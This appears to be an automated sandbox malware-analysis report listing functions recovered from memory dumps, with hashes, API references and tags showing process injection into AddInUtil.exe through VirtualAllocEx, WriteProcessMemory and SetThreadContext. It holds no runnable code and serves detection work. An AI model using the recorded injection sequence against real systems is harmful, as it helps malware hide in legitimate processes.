Instruction Fuzzy Hash: 3131EB3190CB484FDB29EB68984A6FABBF0EB55321F00417FD04AC3153DB756845CB85

Function 00007FF8490C3EB9 Relevance: 1.9, APIs: 1, Instructions: 431
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FF8490C4205

Memory Dump Source

Source File: 00000004.00000002.2198836007.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff8490c0000_Current.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 15e7fedfc86a08386968886e536bd76b66ed713c68a64204ce3a2c3b1addcc33
Instruction ID: 1a3121c00f354e6524b0a2905d0794d5606515eb94e515ef167ca44cdd0823f3
Opcode Fuzzy Hash: 15e7fedfc86a08386968886e536bd76b66ed713c68a64204ce3a2c3b1addcc33
Instruction Fuzzy Hash: E4D1713091CB8D8FEB78EF18D8467E977E1FB54351F14422ADC4EC7281DA74A9858B82

Function 00007FF8490C3BD9 Relevance: 1.6, APIs: 1, Instructions: 131
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FF8490C3C9F

Memory Dump Source

Source File: 00000004.00000002.2198836007.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff8490c0000_Current.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9e030ea89f567e308941e811cc01531eb42d8ae99261cef2bf898d337e977bd0
Instruction ID: 6b6150079886404477230880d479a7dc6b901272edcaa1113db234ae160bdb89
Opcode Fuzzy Hash: 9e030ea89f567e308941e811cc01531eb42d8ae99261cef2bf898d337e977bd0
Instruction Fuzzy Hash: A731E43190CB5C4FDB28EF5898466E9BBF1FB95311F04426FE449D3282CB74A8458BC6

Function 00007FF8490C3A99 Relevance: 1.6, APIs: 1, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FF8490C3B4D

Memory Dump Source

Source File: 00000004.00000002.2198836007.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff8490c0000_Current.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 05c6bbcee981155003c97355c1fa7376a78899a539a9ef4bbf9f7ff62563cc20
Instruction ID: db80789ef7933d31f82f0e1e9577c4f483317a5bc6bc465b2def24a11de7f092
Opcode Fuzzy Hash: 05c6bbcee981155003c97355c1fa7376a78899a539a9ef4bbf9f7ff62563cc20
Instruction Fuzzy Hash: 9631E53190CB4C4FDB1CAB5898066FDBBE1FB55320F00426FE04AC3252CB75A8468B86

Function 00007FF8490C3924 Relevance: 1.6, APIs: 1, Instructions: 108
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE ref: 00007FF8490C39BE

Memory Dump Source

Source File: 00000004.00000002.2198836007.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff8490c0000_Current.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: f284e86633a809fe0e7c101979349439e9ff3598c68cd8d6b904d98e1f8849e8
Instruction ID: 3c84726df176f90d16be9993eb3ba1bf725cdcf9339de44da535142fe6094982
Opcode Fuzzy Hash: f284e86633a809fe0e7c101979349439e9ff3598c68cd8d6b904d98e1f8849e8
Instruction Fuzzy Hash: 8031D83190DB484FDB28EB6898066F97BF0EF55321F04417FD08AD3193DB686849CB55

Function 00007FF848F45798 Relevance: 1.5, Strings: 1, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<I_H, xrefs: 00007FF848F70271

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID: <I_H
API String ID: 0-2715199091
Opcode ID: f0453f2960fd40f7c0e4b49d66ba06dce64284bbaf24bbe0ddaddd5594a86574
Instruction ID: d117bc2c69c45d142eca3d10c988e528ba6f07ac95bf7548f3c168d7e4813a05
Opcode Fuzzy Hash: f0453f2960fd40f7c0e4b49d66ba06dce64284bbaf24bbe0ddaddd5594a86574
Instruction Fuzzy Hash: 55A12671A1DA859FE709EB7880596B97FE1FF9A350F0404BEC08ACB2D3DE286412C744

Function 00007FF848F45748 Relevance: 1.4, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<I_H, xrefs: 00007FF848F70271

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID: <I_H
API String ID: 0-2715199091
Opcode ID: 3c9dc22d26912d917c65bb79737843991bdff5f47cd23806d819ef68f3885833
Instruction ID: b39b16654c89c6a903c9df369535bc9ddeb840db834340a72b433a3cc3dd6025
Opcode Fuzzy Hash: 3c9dc22d26912d917c65bb79737843991bdff5f47cd23806d819ef68f3885833
Instruction Fuzzy Hash: 6C512A7290DA865FD305EB7894592E9BFE0FF8A364F0806BED0C9CB193DB185452C794

Function 00007FF8490C369D Relevance: 1.4, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00007FF8490C3757

Memory Dump Source

Source File: 00000004.00000002.2198836007.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff8490c0000_Current.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0f4482f1ac83428eff29b3f6b385fa9c7d1e0a7a0643a8b559d09389bf719841
Instruction ID: 5408d3e1cb91664df2f9e5306b5a1b830bf124a1d3d4353ebd3599d4ac6a2cb2
Opcode Fuzzy Hash: 0f4482f1ac83428eff29b3f6b385fa9c7d1e0a7a0643a8b559d09389bf719841
Instruction Fuzzy Hash: 6B31163090D7884FEB2ADB6888566E9BFF0EF56320F0442AFD049C7193DA78A446CB51

Function 00007FF848F4394B Relevance: 1.3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K_H, xrefs: 00007FF848F43570

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID: K_H
API String ID: 0-313846638
Opcode ID: 079953a5622e77d79c350604e4f7417f5dbad98261d8d97d314890624d7a3043
Instruction ID: f6f2eebb88a1ae3918377a2a14a6240164fbb40386efdae8af31dceeaffc0b69
Opcode Fuzzy Hash: 079953a5622e77d79c350604e4f7417f5dbad98261d8d97d314890624d7a3043
Instruction Fuzzy Hash: 94F09630A0C6458FEB4CFB6C849553973D2EFA8740F00047ED94A972C7EE18AC018649

Function 00007FF848F43565 Relevance: 1.3, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K_H, xrefs: 00007FF848F43570

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID: K_H
API String ID: 0-313846638
Opcode ID: d26a3894c9722c9d6f8d1560e9ef48e2a107de52beea01cf920312e12cf354c8
Instruction ID: 8268908aaa1e66237695b38cd0cbc065666c0d05cb0cc931c28634785c85ffd1
Opcode Fuzzy Hash: d26a3894c9722c9d6f8d1560e9ef48e2a107de52beea01cf920312e12cf354c8
Instruction Fuzzy Hash: 69D05E34A0CA4A8FE288B65C985257973D2EBE8B40F10003AD84A933C2EE14AC018206

Function 00007FF849020F04 Relevance: .9, Instructions: 897
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2197386981.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849020000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2239e10ce01ef3cf01fbfb3061765dd6034a76c69cc87af4f5c957092aee3666
Instruction ID: 43f4d2ee6f458d4dc74349a773ccbbdfe7f04490c77940ee604762684947cba5
Opcode Fuzzy Hash: 2239e10ce01ef3cf01fbfb3061765dd6034a76c69cc87af4f5c957092aee3666
Instruction Fuzzy Hash: 9232A122F0DE8B1FFAF5AA6C142563556D3EFE8690F9905BAC44EC36DADD28DC064240

Function 00007FF849021761 Relevance: .6, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2197386981.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849020000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515c33f6deeacc09d2ea3baa321c08882779882d4e0615daca2909011467bf64
Instruction ID: a7797d4ec8a667a219a943ae02869e6823f1cd8454689f9d718193cb8daf849e
Opcode Fuzzy Hash: 515c33f6deeacc09d2ea3baa321c08882779882d4e0615daca2909011467bf64
Instruction Fuzzy Hash: B6029021F1CD9A4EFAF6BB6C10516B956D2EFD96D0F6801BAC00DC72C6EE2CEC464245

Function 00007FF848F4606D Relevance: .5, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91485ef63ac06f3ffccbd81748922fb64171f78dbaee5a873203b5c688b93a46
Instruction ID: 169ba485d99caf3b346da50ff534c52079b7bb2fec397ecef0b415d3e60eddd5
Opcode Fuzzy Hash: 91485ef63ac06f3ffccbd81748922fb64171f78dbaee5a873203b5c688b93a46
Instruction Fuzzy Hash: 36F12B73D0E5964FF751B72CA8A65E63B60EF52768F0803B7D08C8A1D3EB1C18468699

Function 00007FF848F405B0 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728945357f01c8eb7f997b90e4598b5afa079fcc19edd577782776b88c1d3c6f
Instruction ID: cb8d7106587ac09fea0bf548d11388e53d90da5b96a8087bc25b5543ef9d2dd5
Opcode Fuzzy Hash: 728945357f01c8eb7f997b90e4598b5afa079fcc19edd577782776b88c1d3c6f
Instruction Fuzzy Hash: 68B1677091E6859FDB05EBB880692B9BFE1FF5A350F0404FED08ACB2D7DA2864428704

Function 00007FF848F4E460 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0ba1e0632e1df1ea342c2f052ef7c27e5f6ad04948d450bc7c4bd1f0733476
Instruction ID: bff0506473f0b23b3bdba5f5c64343891a3834302990229105d82b8a6157ebee
Opcode Fuzzy Hash: 8c0ba1e0632e1df1ea342c2f052ef7c27e5f6ad04948d450bc7c4bd1f0733476
Instruction Fuzzy Hash: DD61A43090CA4D8FEB98EF28D8557F837D1FB59350F00417AD84DC7292DB79A8818B85

Function 00007FF848F461FD Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e6be1b2489b6d4b1dcaacff0d736d5773637e39162fd209a0e9148223c22fa
Instruction ID: 8bfb0628b33e4e76c61c47eacf3cc69fdaa67add08f93444af5063b6ca7fda7d
Opcode Fuzzy Hash: f4e6be1b2489b6d4b1dcaacff0d736d5773637e39162fd209a0e9148223c22fa
Instruction Fuzzy Hash: A351E663D1E5965FF741B73CA4A60E67BA0FF5166CF0842B3D0888D193FE1C644A8698

Function 00007FF848F4054F Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fca1f49385152a9839fc0e768f67828ae1768e30259543aa11d272493e4a6df
Instruction ID: dbc4497aaa6e5f4ed96b742b462137a511062b22313cc2b77f2f9bf94080f131
Opcode Fuzzy Hash: 5fca1f49385152a9839fc0e768f67828ae1768e30259543aa11d272493e4a6df
Instruction Fuzzy Hash: 5E513771A0E5859FD745EB7C94192E67FE0FF8A360F0806BFD0C8CB193DA2864468795

Function 00007FF848F4225D Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d895fb0a488b3b2592a72fdd09a8f92f062384db267a5961d5404ba2121bce49
Instruction ID: 502fdf5d1f75cc108f832ca62e2c6aead27426f164de633ce1ed95281924917e
Opcode Fuzzy Hash: d895fb0a488b3b2592a72fdd09a8f92f062384db267a5961d5404ba2121bce49
Instruction Fuzzy Hash: 5251267190EA865FD745EB7888296A6BFE1FF5B350F0805FED088CB2D3DA285806C751

Function 00007FF849021617 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2197386981.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849020000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7dccf76f9f1590d2fb0dc180ec486c1a1f89367e3ba55bd0d4ab6f5b2cf8db6
Instruction ID: 260ea1ab9735f706999660cfb7c8f8f25d0e9a557e43b17bb316d36a57713667
Opcode Fuzzy Hash: b7dccf76f9f1590d2fb0dc180ec486c1a1f89367e3ba55bd0d4ab6f5b2cf8db6
Instruction Fuzzy Hash: 98315E21F1CD8A0FFAE5F76C041963951D2EFD8A80FA905BAD40EC72DAEE28DC064345

Function 00007FF849021541 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2197386981.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849020000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c3a8b4f9ab1817513ca50dfee544d4bae52da1e02bd470c33eafb4cc821139
Instruction ID: dde7b1aecfa79a189503e15b188d867a693d9adb1bb0018ab1d0bb035154ecaf
Opcode Fuzzy Hash: e3c3a8b4f9ab1817513ca50dfee544d4bae52da1e02bd470c33eafb4cc821139
Instruction Fuzzy Hash: B631AE21F1CD8A5FF6E9BB6C041523951D3EFD8690F9805BAD00EC32DAEE28DC464345

Function 00007FF84902146B Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2197386981.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849020000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4800ccf048f680496986b368ad8c65ec3580c9117625a418ee9ac87f86a87a3b
Instruction ID: f6bf8e9c19ccdc9a9d9420858fa4e9239e20fcdd3ecac2a16238591909d0628f
Opcode Fuzzy Hash: 4800ccf048f680496986b368ad8c65ec3580c9117625a418ee9ac87f86a87a3b
Instruction Fuzzy Hash: 0D318021F1CE8A1EF6E9FB6C041563A51D3EFD8691F9805BAC40EC32D6DE28DC064244

Function 00007FF848F4156E Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6bd8f3fe847c21365d9f93c8529ce4f4d11d3523b0d7f2071da3a6a6149b632
Instruction ID: 774ebc74a34db80ef8cefc241e995173e27d58e2192a2ff9cb181eaabc8b6e50
Opcode Fuzzy Hash: b6bd8f3fe847c21365d9f93c8529ce4f4d11d3523b0d7f2071da3a6a6149b632
Instruction Fuzzy Hash: 4D314231A188599FDBD5FB6CC559AA877F2FFAC740B0900B5D009EB2A2DE28DC41CB11

Function 00007FF848F416A8 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 415004116e492a1f2fa72f16d9dccf46f741517a3340c2b651ba9e0fe51c815d
Instruction ID: 89adf5b3b8b74fbbb85123f1d556bae935016e5450184af455a02298ddf5975b
Opcode Fuzzy Hash: 415004116e492a1f2fa72f16d9dccf46f741517a3340c2b651ba9e0fe51c815d
Instruction Fuzzy Hash: BA317230E1C95D9FEBD9FB6884556BCA7E2FF98A40F54017AD40EE32C6CE2858424745

Function 00007FF848F405B8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a347a0b241001268bf9f5745d45fbdaa2ea366bc2ab4938d67a848147e1b13
Instruction ID: 3334332ad709e55bb37909d9f226c580d5abc16a43f53036953e7f6421562a24
Opcode Fuzzy Hash: e0a347a0b241001268bf9f5745d45fbdaa2ea366bc2ab4938d67a848147e1b13
Instruction Fuzzy Hash: 5E31067190E6C55FE741E778846A6BA7FE1EF5A350F0804FED089CB1A3D928A8068311

Function 00007FF84902186D Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2197386981.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849020000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274041243694a403879c83a798c4d246a216c83e320f002cf164054c9bfe87cc
Instruction ID: aad53c69d7a6258742cab9a593f48499c5c3806cad4c4390049a91e62f2838ae
Opcode Fuzzy Hash: 274041243694a403879c83a798c4d246a216c83e320f002cf164054c9bfe87cc
Instruction Fuzzy Hash: E8115122F1DE4E1EFAF5BA6C105167952C2EF986D0FA4117AC40EC72C6EE1DEC434285

Function 00007FF848F41795 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b42e3a2c4a8dfb9a2ff664918c9dbbe48c400d23568dd20d1f89814baaf03d
Instruction ID: 5b8b2098203262046ca54101cfb1144989ca1fa1e12bd0d4d6a1018834dc144d
Opcode Fuzzy Hash: 35b42e3a2c4a8dfb9a2ff664918c9dbbe48c400d23568dd20d1f89814baaf03d
Instruction Fuzzy Hash: 5A113030B0D9194FE6D8B728406677876D1EFA9B80F91017AD04ED32C2DE596C408B46

Function 00007FF848F40BD2 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f203eb8eb6e969e2df53e611d522a7cca8d004afee3eb6c0e5dd44f247b0d36d
Instruction ID: da7580bb381926c3f7b5cd1e28bb1486e67ebd7c3ecd8f8cd3adb4c307c8e4d3
Opcode Fuzzy Hash: f203eb8eb6e969e2df53e611d522a7cca8d004afee3eb6c0e5dd44f247b0d36d
Instruction Fuzzy Hash: F511C271C0D7C58FD75397A888692D93FB0AF27350F1901EBC089DB1E3EA285059D716

Function 00007FF848F41551 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7093ce3725de5ab5a041bb2d3b3c66063bbffe8e721f2f71179e2b70725b987
Instruction ID: 1728879493c22a77f39926883564a1f64fb85c4dd1abab813c21b0d0d7c3813e
Opcode Fuzzy Hash: a7093ce3725de5ab5a041bb2d3b3c66063bbffe8e721f2f71179e2b70725b987
Instruction Fuzzy Hash: 0701B57490D6C98FEB56EBA488686987FF1EF26340F0500BBD046DB192DA249445C715

Function 00007FF848F414E1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 314a2f125434f05f8044921078865e647474eeb476ce36f1f6533f639f0978b8
Instruction ID: 20cdc96af74ef38cf91893b2fdfcf1db7f1fa7876d42fa0bba69e5af9fa57fe7
Opcode Fuzzy Hash: 314a2f125434f05f8044921078865e647474eeb476ce36f1f6533f639f0978b8
Instruction Fuzzy Hash: 08019E7180E7C54FD71397A488B92993FB0AF27300F0900EBC085DB1E3E618A418C762

Function 00007FF848F45AD1 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4568e66105153c1586a74622458676e91d5aff0bc0f53c55b8486be4424f2881
Instruction ID: 53b3814e7d64e2c56679f83be6fbb72cb2412aa7a7cde3ef2e04e769d6047fb9
Opcode Fuzzy Hash: 4568e66105153c1586a74622458676e91d5aff0bc0f53c55b8486be4424f2881
Instruction Fuzzy Hash: 57018C35D0C54EDFEB10FF64C4881EDBBA1FF28750F6441A6D405A7284EA746A488B84

Function 00007FF848F408A9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 390c5fa7a20959cd738cce2a504fbce9dc19df8d18f84b1ea2776e4b24d72e27
Instruction ID: 82c379b12a33335c0b58779034d3aac2042c599a5a44893f01c7ba3b4c87fcbb
Opcode Fuzzy Hash: 390c5fa7a20959cd738cce2a504fbce9dc19df8d18f84b1ea2776e4b24d72e27
Instruction Fuzzy Hash: 97F0FB3284E3C80FE313A73058652943F70AF53210F0A41DBD888CA0A3EA1899198762

Function 00007FF848F41623 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a26e856f6d0b4d42a3bc40a638913ae118e79ee835a1f00520a055b9895dfa12
Instruction ID: 31f018f4a5312c698dc908b287a12e9576d039d206154a7c9e9f67c7c3ea70b3
Opcode Fuzzy Hash: a26e856f6d0b4d42a3bc40a638913ae118e79ee835a1f00520a055b9895dfa12
Instruction Fuzzy Hash: F9E04F74A0D9598FCB49EB6CC4A9AA87BF1EF6D30074504A9D04EDB2A6CA28DC40CB04

Function 00007FF848F45BB7 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c21616e7e16c76b9ff9570e35ea46e11830bc5ce78d126d08a7b687b5ae6b62
Instruction ID: 41b4b41531079dfbd258ca880f454a44460bf8b56a942b025d83ec5fb026500b
Opcode Fuzzy Hash: 9c21616e7e16c76b9ff9570e35ea46e11830bc5ce78d126d08a7b687b5ae6b62
Instruction Fuzzy Hash: 62E0127181D6D66FD34EAB7414671A96FA0AF1A741F0804FFE1899B1D3CA2814D48315

Non-executed Functions

Function 00007FF848F405FA Relevance: 5.1, Strings: 4, Instructions: 135COMMON

Download Yara Rule

Strings

L_^|, xrefs: 00007FF848F406C9
>L_^, xrefs: 00007FF848F40601
L_^z, xrefs: 00007FF848F406C2
L_^|, xrefs: 00007FF848F406CA

Memory Dump Source

Source File: 00000004.00000002.2196031139.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f40000_Current.jbxd

Similarity

API ID:
String ID: >L_^$L_^z$L_^|$L_^|
API String ID: 0-901091740
Opcode ID: 6c58516b73929112f2a317840b0c5ec6401f3e1c96073d681f6320698a2b8f32
Instruction ID: f585ba18e5a03d155d929420305a11530180312652cb129515fc1b4a380b5c99
Opcode Fuzzy Hash: 6c58516b73929112f2a317840b0c5ec6401f3e1c96073d681f6320698a2b8f32
Instruction Fuzzy Hash: 8C31822BB2F52666916176AE78460FE2750DFD07FAF084633D65C8C0D35E0D608545FA

Analysis Process: AddInUtil.exePID: 6044, Parent PID: 7104COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25%
Total number of Nodes:	16
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF8490B78F8 Relevance: 3.3, APIs: 2, Instructions: 343
memoryinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FF8490B7A3D
WriteProcessMemory.KERNEL32 ref: 00007FF8490B7B8F

Memory Dump Source

Source File: 00000005.00000002.4912525787.00007FF8490A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490a0000_AddInUtil.jbxd

Similarity

API ID: AllocMemoryProcessVirtualWrite
String ID:
API String ID: 645232735-0
Opcode ID: 40e92dce70966ee3d66b1be6fbde400d66a222e7b5622e2e8f863b59f6aeed25
Instruction ID: 6bb10485aa6acc19a1e93ce91c065a267825f6e9d8b1dc73143d2212d066224f
